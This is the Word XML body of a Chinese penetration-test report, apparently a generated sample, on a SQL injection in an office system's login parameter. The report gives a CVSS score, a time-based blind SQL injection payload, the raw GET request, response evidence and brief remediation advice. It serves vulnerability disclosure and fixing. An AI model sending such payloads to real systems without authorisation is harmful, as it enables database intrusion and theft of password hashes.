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 xml:space="preserve">SQL 注入 漏洞报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>受测单位：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">示例单位（样本占位，生成时自动替换为真实单位）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>系统名称：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OA 办公系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>测试时间：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2026-09-21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">本报告针对「SQL 注入」单个漏洞出具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本报告针对单个漏洞出具，记录该漏洞的验证证据、危害与加固建议。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. SQL 注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>目标：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://oa.example.gov.cn/login?id=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>危害等级：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">高危（CVSS 8.6）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>危害描述：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">登录接口 id 参数存在报错型 SQL 注入，可读取数据库任意表，泄露用户口令散列。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证方式：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sqlmap 手工验证 + 延时盲注确认</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC / 复现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">payload：id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -</w:t>
        <w:br/>
        <w:t xml:space="preserve">请求：GET /login?id=1'%20AND%20(SELECT%20SLEEP(5))-- - HTTP/1.1  Host: oa.example.gov.cn</w:t>
        <w:br/>
        <w:t xml:space="preserve">关键响应：HTTP/1.1 200，X-Response-Time: 5023ms，返回 SQL 语法错误堆栈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>证据（工具原始响应）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">响应体返回 You have an error in your SQL syntax；延时 payload 稳定延迟 5.02s，无 payload 时 12ms。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>截图证据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>【此处插入截图（如有，人工补充）】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、加固建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>针对本漏洞按验证方式定位根因并修复；修复后复测验证；举一反三排查同类接口/参数是否存在相同问题。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